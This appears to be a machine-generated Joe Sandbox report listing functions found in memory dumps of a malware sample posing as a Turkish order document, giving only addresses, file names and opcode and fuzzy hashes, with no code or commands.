                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8c0a281b67fcee5dcf09805923792d98cb1053e354e8243b7c9c814f6ab6f05c
                                                                                                      • Instruction ID: 695ecf25967f2d8546c4e45755be34fa65b3341de25ea43fca3dc7305ad764c8
                                                                                                      • Opcode Fuzzy Hash: 8c0a281b67fcee5dcf09805923792d98cb1053e354e8243b7c9c814f6ab6f05c
                                                                                                      • Instruction Fuzzy Hash: A93116B5D012199FCB10CFA9D584BDEBBF4FB48320F14806AE918AB351D3749A44CFA5
                                                                                                      Function 00FED044 Relevance: .1, Instructions: 72COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2527615938.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_fed000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3a5a6dcab1708b4c34f2f1195b192100df0f603bff2e288246bc7a704902cc4e
                                                                                                      • Instruction ID: 21b4a188acc597672224f81bd23a797533dda0199a631799f016bf7cf45b6ec2
                                                                                                      • Opcode Fuzzy Hash: 3a5a6dcab1708b4c34f2f1195b192100df0f603bff2e288246bc7a704902cc4e
                                                                                                      • Instruction Fuzzy Hash: BB214972904384EFDB14DF20C9C0B26BB65FB84324F24C56DE9490F696C73AD847DA62
                                                                                                      Function 057788D0 Relevance: .1, Instructions: 70COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a84c501a93a0c37f24e85128678c9503125f25bc22b1d0fa873980e72898ee91
                                                                                                      • Instruction ID: 321755da46670e1e18d70331db7af2652612ae7547d4042fedf38d2dd797321f
                                                                                                      • Opcode Fuzzy Hash: a84c501a93a0c37f24e85128678c9503125f25bc22b1d0fa873980e72898ee91
                                                                                                      • Instruction Fuzzy Hash: 572104B1D012199FCB10CF99E484BDEBBF4FB48320F14806AE919AB241D375AA44CBA4
                                                                                                      Function 05779EA9 Relevance: .1, Instructions: 69COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d429afd995908d87457952764e5e29dcca12173c1a502bdb3c5e2ba42fa40808
                                                                                                      • Instruction ID: 4b1df2a061e87d771719780a9a5d955bb48bc08ae6e6bac56af795d996f8d33d
                                                                                                      • Opcode Fuzzy Hash: d429afd995908d87457952764e5e29dcca12173c1a502bdb3c5e2ba42fa40808
                                                                                                      • Instruction Fuzzy Hash: 462104B1D012199FCB10CFA9D884BDEBBF4FB48320F14806AE919AB240D3749A44CFA4
                                                                                                      Function 02A14285 Relevance: .1, Instructions: 68COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 128c6befe4dc6e282e52ef17842e2e9f43ecc38a82c68a8549c1ab85d1b0bf11
                                                                                                      • Instruction ID: b8ea75e6f5acaeceb698a2718710fa7b9f377413d46eaf2a2e6dbdec6aa2b7d7
                                                                                                      • Opcode Fuzzy Hash: 128c6befe4dc6e282e52ef17842e2e9f43ecc38a82c68a8549c1ab85d1b0bf11
                                                                                                      • Instruction Fuzzy Hash: 42319278E01308CFCB48DFA8E59499DBBB6FF49314B204469E819AB364DB31AD45DF00
                                                                                                      Function 02A15649 Relevance: .1, Instructions: 67COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e77a0d8d8f459a22e440d894f3d2fd07a634a2c6ac1be3457d17ccb76148b84b
                                                                                                      • Instruction ID: d8ec59278a514b29af827a3f224c773ada544017bda2f13dace4ba480e05c007
                                                                                                      • Opcode Fuzzy Hash: e77a0d8d8f459a22e440d894f3d2fd07a634a2c6ac1be3457d17ccb76148b84b
                                                                                                      • Instruction Fuzzy Hash: B221CF31A05118CFCB14AF25E8857AF3BA2EF86325F044429F9158B349CF78CE61CBA1
                                                                                                      Function 05778C4A Relevance: .1, Instructions: 67COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b34d555b9733385fce91b0460daff43177ff5b697afaef65ead4e03f0e5a68fd
                                                                                                      • Instruction ID: 5683305723ea6c8e60d0315e30358c6480b41d83195981fd677900e4803c1931
                                                                                                      • Opcode Fuzzy Hash: b34d555b9733385fce91b0460daff43177ff5b697afaef65ead4e03f0e5a68fd
                                                                                                      • Instruction Fuzzy Hash: FC11E6327042145FDB0A5FB8E85976E3FA7EFC9210B68442AE506CB391DE394C0693E2
                                                                                                      Function 02A19761 Relevance: .1, Instructions: 65COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f070f5005c36b36215b7222ce513746424f03f69dd8b9bc8275abc33f5d1c67c
                                                                                                      • Instruction ID: c0287faf39b65f49020d78fd68fc0946ca87101ad618b4eecf3c6113a369fb80
                                                                                                      • Opcode Fuzzy Hash: f070f5005c36b36215b7222ce513746424f03f69dd8b9bc8275abc33f5d1c67c
                                                                                                      • Instruction Fuzzy Hash: 27218B30E01249DFDB05DFA1D5A0AEEBFB6AF49319F148469E411E6290DF30D941DB60
                                                                                                      Function 02A16300 Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 733e8ff566b157c200fd7c17e07f3242eecd23733f337c1fa1115262ab2c6b2c
                                                                                                      • Instruction ID: fa51925c14e203949cd68340f96e77e9fba008b3e699c5af10fdbf6452fe6bb2
                                                                                                      • Opcode Fuzzy Hash: 733e8ff566b157c200fd7c17e07f3242eecd23733f337c1fa1115262ab2c6b2c
                                                                                                      • Instruction Fuzzy Hash: 601108357016119FC7159B2AD494A3EB7AAFFC5BA530844B8E916CB754CF35DC02C790
                                                                                                      Function 02A127F0 Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 28db57f085da14e96bb593e27816860abfd1a90bacd7e37a4c3700accf6fb612
                                                                                                      • Instruction ID: 1aa6f37f61e7c750c75461df831d53af34d3a8cdd79c5bc135e39a5ba31e0fde
                                                                                                      • Opcode Fuzzy Hash: 28db57f085da14e96bb593e27816860abfd1a90bacd7e37a4c3700accf6fb612
                                                                                                      • Instruction Fuzzy Hash: C821E374C0420A9FCB00DFA9D9446EEBFF4FF4A300F10456AD815B3220EB309A96CBA0
                                                                                                      Function 02A1F658 Relevance: .1, Instructions: 57COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: dabf9a56c76c760da2010f4c0e85061307eb9e65959ddcc5bef82f8db7b7c362
                                                                                                      • Instruction ID: cc24532acc081036401d16fb87ccf5ad8a720726230a257c46a9e9a42af5ba20
                                                                                                      • Opcode Fuzzy Hash: dabf9a56c76c760da2010f4c0e85061307eb9e65959ddcc5bef82f8db7b7c362
                                                                                                      • Instruction Fuzzy Hash: BA215B75D003499FDB05EFA9D98078EBBF2FF45304F1481AAD018EB265EB345A05AB81
                                                                                                      Function 057787A8 Relevance: .1, Instructions: 55COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 49a0c7bb520f5e10f32bb0c456f2ba7fa2356c1ed9430ed7489459628dc49343
                                                                                                      • Instruction ID: 7e752950e343eaa0e0d3175b9074fb91b84f8453ca78cf92a70f0855c11f2577
                                                                                                      • Opcode Fuzzy Hash: 49a0c7bb520f5e10f32bb0c456f2ba7fa2356c1ed9430ed7489459628dc49343
                                                                                                      • Instruction Fuzzy Hash: 521167B280024DDFDF20CF99D844BDEBBF5EB48320F148419E928A7211C379A950DFA5
                                                                                                      Function 02A1F668 Relevance: .1, Instructions: 54COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 42f9310ef23f0a0d438dbc1a878cec364974e2fd71c098255243a4e880930fb6
                                                                                                      • Instruction ID: fc41fc3e270343483582827c9fa02620b7c38aad4fef63b65f0a7037237ec72e
                                                                                                      • Opcode Fuzzy Hash: 42f9310ef23f0a0d438dbc1a878cec364974e2fd71c098255243a4e880930fb6
                                                                                                      • Instruction Fuzzy Hash: 51117C74D0024D9FEB04EFB9D98079EBBF2FB45304F0085A9D118EB269EB345A05AF81
                                                                                                      Function 05778431 Relevance: .1, Instructions: 54COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1ad5876380764129ecab7cd9c12567b083ad3e1783b196f1426d46f6c61c3313
                                                                                                      • Instruction ID: 95df630e257da52bd720eb4a4659664696e0a335cf918c9165e73370b3d809df
                                                                                                      • Opcode Fuzzy Hash: 1ad5876380764129ecab7cd9c12567b083ad3e1783b196f1426d46f6c61c3313
                                                                                                      • Instruction Fuzzy Hash: 3D113034F001498FDF10DFA8E954BAEBBB6AB59311F008061E808E7345E67099419F51
                                                                                                      Function 05778EF1 Relevance: .1, Instructions: 54COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bd55b87c845776de78e62e2b38b115b8c99912bd099cf32759625ef506cc0ef6
                                                                                                      • Instruction ID: 132e721084b70fe9df592b1e940e607bce25e58e1e7657057371ca9d70dd571b
                                                                                                      • Opcode Fuzzy Hash: bd55b87c845776de78e62e2b38b115b8c99912bd099cf32759625ef506cc0ef6
                                                                                                      • Instruction Fuzzy Hash: ED1167B2800249DFDB10CF99D844BDEBFF5EF48320F148419E528A7211C33AA550DFA5
                                                                                                      Function 00FED03F Relevance: .1, Instructions: 53COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2527615938.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_fed000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                                                      • Instruction ID: bf41f0292923914e91854d7ae092d0af2a6367045280ff98d3134ee4c8bf6335
                                                                                                      • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                                                      • Instruction Fuzzy Hash: BF110075904280DFDB11CF10C9C0B15FF61FB44324F28C6AAD8494BA96C33AD80ACF52
                                                                                                      Function 02A15E98 Relevance: .1, Instructions: 52COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4c01eae67205b161c92f561b298f929693ab1e68fb44e001c7550f2fc99ceb2c
                                                                                                      • Instruction ID: ef3b657607a0e70725d878a56e403ce9bfe9b98870c21a1c03d82266e557bad9
                                                                                                      • Opcode Fuzzy Hash: 4c01eae67205b161c92f561b298f929693ab1e68fb44e001c7550f2fc99ceb2c
                                                                                                      • Instruction Fuzzy Hash: 0101F532B041546FCB12CFA9A8506EF3FA7DFC9354B18845AF605CB294CE35C9229BA1
                                                                                                      Function 02A1E8E8 Relevance: .0, Instructions: 48COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fcc37bcb8fa290a8fb1231a0ce3a8662f832fddc7851f4af6377317829e04d55
                                                                                                      • Instruction ID: 4169016e2841bc4304528a5e597365269d5513603200d96eda438184dfff6158
                                                                                                      • Opcode Fuzzy Hash: fcc37bcb8fa290a8fb1231a0ce3a8662f832fddc7851f4af6377317829e04d55
                                                                                                      • Instruction Fuzzy Hash: 8711A974D00249AFCB40DFA8D880AAEFBB0FB4A300F0080A6D910E7364D7309A42DB90
                                                                                                      Function 02A1ABE0 Relevance: .0, Instructions: 44COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1f41555984fcaa3aa089078697d016964a6b8fe510a0a6e27110038a11335030
                                                                                                      • Instruction ID: 9e8829540023f7702bc968965ec75461664e0ec5d15b21a2bf895526f5a96e97
                                                                                                      • Opcode Fuzzy Hash: 1f41555984fcaa3aa089078697d016964a6b8fe510a0a6e27110038a11335030
                                                                                                      • Instruction Fuzzy Hash: 71F096317416104B87255B6F9494B2BB6EEEFC8A75715407AE906CB362EF21CC03C794
                                                                                                      Function 00FDD005 Relevance: .0, Instructions: 39COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2527549894.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_fdd000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f59f6f688cdaf88257a452f6aaff41595e2c8f266f03bd9c7d8ab7bb1c62047d
                                                                                                      • Instruction ID: fd0b119c15a549e1123e4cebf39bcfc87eab021a725b34253e611f7da9d4cc50
                                                                                                      • Opcode Fuzzy Hash: f59f6f688cdaf88257a452f6aaff41595e2c8f266f03bd9c7d8ab7bb1c62047d
                                                                                                      • Instruction Fuzzy Hash: D501EC71109780AFC3228F15CC94C22BFB9EF8662071A85DAE8998F263C625EC05CB61
                                                                                                      Function 00FDD01F Relevance: .0, Instructions: 37COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2527549894.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_fdd000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 104ef115cca2bb6ab8440de443fc95a6c546b72e8be8123bb159be1282b14b3c
                                                                                                      • Instruction ID: f1015099c89c9a7b1ef60050fedf797182c3a2e9ee227e2853fc8f49c3308b22
                                                                                                      • Opcode Fuzzy Hash: 104ef115cca2bb6ab8440de443fc95a6c546b72e8be8123bb159be1282b14b3c
                                                                                                      • Instruction Fuzzy Hash: 38F0F976600604AFD7208F0AD884C27FBADEBC4770719C59AF84A4B712C672EC42CEA0
                                                                                                      Function 02A19C2C Relevance: .0, Instructions: 30COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7418978ff57d56366c509103fdd0308639f633ad6143638a991805643a351ae8
                                                                                                      • Instruction ID: 478034c4cf12c31b23fb73656c4a9e35072d1a5e1d3845b8384c11986ce5900c
                                                                                                      • Opcode Fuzzy Hash: 7418978ff57d56366c509103fdd0308639f633ad6143638a991805643a351ae8
                                                                                                      • Instruction Fuzzy Hash: EFF08C76E001589FCB108F699848AEEBBB6EBC8330F00C126E918C3250DB318A16CB90
                                                                                                      Function 02A128A3 Relevance: .0, Instructions: 21COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cd0da0f0e27e30e4578d2b9d11fa15240b143c2b9c110d2c1b00230eafce0085
                                                                                                      • Instruction ID: 569c0e2a34d9577c89f129aa77785d5537c5f3cedd73faa7e7c59da78dd7c531
                                                                                                      • Opcode Fuzzy Hash: cd0da0f0e27e30e4578d2b9d11fa15240b143c2b9c110d2c1b00230eafce0085
                                                                                                      • Instruction Fuzzy Hash: A1E02035D543A58FC701D7F4DC000EEBF34EDC2211718459BC06137094EB305519C3A1
                                                                                                      Function 02A16739 Relevance: .0, Instructions: 19COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3c6bdf37fd20949dfc79fcad8e44e873311fc34a3c217c5213cdc03dedea3fc5
                                                                                                      • Instruction ID: 46d81b4de1d72d6acada4bb577e6a615b75d36fda85bf13d0b20eb0a5c80a6a4
                                                                                                      • Opcode Fuzzy Hash: 3c6bdf37fd20949dfc79fcad8e44e873311fc34a3c217c5213cdc03dedea3fc5
                                                                                                      • Instruction Fuzzy Hash: 40E0C2244093924FE303B778E8111803F3AAD8B1003088BA2A4444E96FDE7488179723
                                                                                                      Function 02A128B0 Relevance: .0, Instructions: 19COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 363854633b4cfb19cfcbdcf653032df7b27b8a7d65bad9c86bc994d845f60fbb
                                                                                                      • Instruction ID: 01bee33d49dbe891f419d92e91c8902dac4829102c03bb42200e91b9da9e6017
                                                                                                      • Opcode Fuzzy Hash: 363854633b4cfb19cfcbdcf653032df7b27b8a7d65bad9c86bc994d845f60fbb
                                                                                                      • Instruction Fuzzy Hash: 46D05B31D2033A57CB10E7A5DC044DFFB38EED5321B514666D51437144FB706659C6E1
                                                                                                      Function 02A18EF8 Relevance: .0, Instructions: 18COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                      • Instruction ID: ed29341f4af8169f26ca9c20cbead6eff96a47ebdbf8b8d4ab5c53ad879ae99e
                                                                                                      • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                      • Instruction Fuzzy Hash: F4C08C3320C1282EB234104E7C80EA3BB8DC3C13B4B210137FA1CD7200AC4A9C8041F8
                                                                                                      Function 02A1D6D4 Relevance: .0, Instructions: 16COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8d2675d293465b6fdf74b1e84c36b5a029573da134f94ef2ae392460c826bd16
                                                                                                      • Instruction ID: fb5dd4441246430e44ed8b76c9e7f1c5759b4ca02f0fa1e0e74855119963ee9e
                                                                                                      • Opcode Fuzzy Hash: 8d2675d293465b6fdf74b1e84c36b5a029573da134f94ef2ae392460c826bd16
                                                                                                      • Instruction Fuzzy Hash: 19D04235E44509CBCF20DFA9E4944DCBBB1EB49325B10542BE929A7251DA305866CF11
                                                                                                      Function 02A1AFAD Relevance: .0, Instructions: 16COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
